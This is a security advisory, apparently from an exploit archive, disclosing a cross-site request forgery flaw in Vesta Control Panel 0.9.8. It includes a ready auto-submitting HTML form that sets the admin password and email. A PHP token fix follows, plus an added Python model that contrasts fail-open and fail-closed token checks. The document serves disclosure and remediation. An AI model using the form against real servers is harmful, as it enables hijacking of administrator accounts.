Vesta Control Panel 0.9.8 Cross Site Request Forgery

2015.05.26
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Vesta Control Panel CSRF (change admin password)
# Date: 24-05-2015
# Exploit Author: Ben Khlifa Fahmi
# Vendor Homepage: https://vestacp.com/
# Software Link: http://vestacp.com/pub/vst-install.sh
# Version: 0.9.8 (amd64)
# Tested on: Ubuntu Trusty 14.04

Description:
---------------------------------------------------------------
The vulnerability exists on the page /edit/user/index.php. Vesta CP is vulnerable to CSRF: an attacker can change the "admin" password by sending a crafted page to an already logged-in user. Once the victim visits that page, the user's password is changed to the one set by the attacker.

Exploit Code:

<html>
<head><title>Victim will redirect auto</title></head>
<body onload="document.forms[0].submit()">
<form id="vstobjects" method="post" name="v_edit_user" action="https://[target]:8083/edit/user/?user=admin">
<input type="hidden" name="v_user" value="admin">
<input type="hidden" name="v_username" value="admin">
<input type="hidden" name="v_password" value="[hacker pass]">
<input type="hidden" name="v_email" value="[hacker mail]">
<input type="hidden" name="v_package" value="default" />
<input type="hidden" name="v_language" value="ar" />
<input type="hidden" name="v_fname" value="System">
<input type="hidden" name="v_lname" value="Administrator">
<input type="hidden" name="v_shell" value="bash" />
<input type="hidden" value="ns1.localhost.ltd">
<input type="hidden" value="ns2.localhost.ltd">
<input type="hidden" name="v_ns3">
<input type="hidden" name="v_ns4">
<input type="submit" class="button" name="save" value="Save">
</form>
</body>
</html>

Impact: Critical, as an attacker can change the admin email, password, DNS settings and more.

Solution:

Add this code to the page /edit/user/index.php after the session start. The token is issued when the form is rendered and verified on every POST; a request with a missing or mismatched token is rejected and processing stops:

$token = uniqid(mt_rand(), true);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // Form is being rendered: store the token the form will echo back.
    $_SESSION['token'] = $token;
} elseif (!isset($_POST['token'], $_SESSION['token'])
          || !hash_equals($_SESSION['token'], $_POST['token'])) {
    // Missing or mismatched token: treat the request as forged.
    // hash_equals() needs PHP >= 5.6; on older releases use === instead.
    header('Location: /error/');
    exit;
}

At the end of the page add:

$_SESSION['token'] = $token;

Also don't forget to add this hidden field inside the form on the page:

<form id="vstobjects" method="post" name="v_edit_user">
<input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"/>

Greetz to: ArabOUG Cyber Security Team, Tunisian Whitehat Security, Tunisian Agency of Internet Team, BenCure CERT Team (Ben Yahia Mohamed, Ben Salem Salma, Ben Khlifa Fahmi (me), Moez Chakchouk, Ben Mne Tarek), Amine Zemzemi, Saif Bejaoui, Mohamed Amen Allah Bechikh, Youssef Warheni, Manel Nouali, Ben Gharbia Jihed, and all my friends. And a special Greetz to my fiancée <3
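As an added example that is not part of the advisory or of Vesta, the per-session token check the solution describes, modelled in Python with plain dicts standing in for $_SESSION and $_POST: a fail-open variant that skips the comparison whenever no token field is posted, beside the fail-closed check that every POST must pass.

```python
import hmac
import secrets

# Added example, not Vesta code: models the per-session token check the
# solution above describes. Plain dicts stand in for $_SESSION and $_POST.

def issue_token(session: dict) -> str:
    """Issue a fresh token when the edit form is rendered (the GET case)."""
    session["token"] = secrets.token_hex(32)  # CSPRNG; stronger than uniqid()
    return session["token"]

def fail_open_check(session: dict, post: dict) -> bool:
    """Compares only when the client sent a token, so a POST with the field
    omitted passes; this does not stop a forged cross-site form."""
    if "token" in post:
        return hmac.compare_digest(session.get("token", ""), post["token"])
    return True

def fail_closed_check(session: dict, post: dict) -> bool:
    """Every POST must carry a token equal to the one stored in the session."""
    expected = session.get("token")
    supplied = post.get("token")
    if not expected or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected, supplied)  # constant-time compare

def handle_edit_user(session: dict, post: dict, check) -> str:
    """Server side of the /edit/user/ POST, reduced to the CSRF gate."""
    if not check(session, post):
        return "redirect:/error/"
    session["token"] = secrets.token_hex(32)  # rotate after a successful use
    return "updated user " + post["v_user"]  # constructed stand-in for the update

def demo() -> dict:
    """One session, three POST bodies: the genuine form, a cross-site form
    that omits the token field, and one that guesses the token."""
    session = {}
    token = issue_token(session)
    genuine = {"v_user": "admin", "v_password": "N3wP4ss", "token": token}
    no_token = {"v_user": "admin", "v_password": "forged"}
    bad_token = {"v_user": "admin", "v_password": "forged", "token": "guess"}
    return {
        "open_genuine": handle_edit_user(dict(session), genuine, fail_open_check),
        "open_no_token": handle_edit_user(dict(session), no_token, fail_open_check),
        "closed_genuine": handle_edit_user(dict(session), genuine, fail_closed_check),
        "closed_no_token": handle_edit_user(dict(session), no_token, fail_closed_check),
        "closed_bad_token": handle_edit_user(dict(session), bad_token, fail_closed_check),
    }
```

Only the fail-closed check turns both forged bodies into the /error/ redirect while still accepting the genuine form.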
Copyright 2024, cxsecurity.com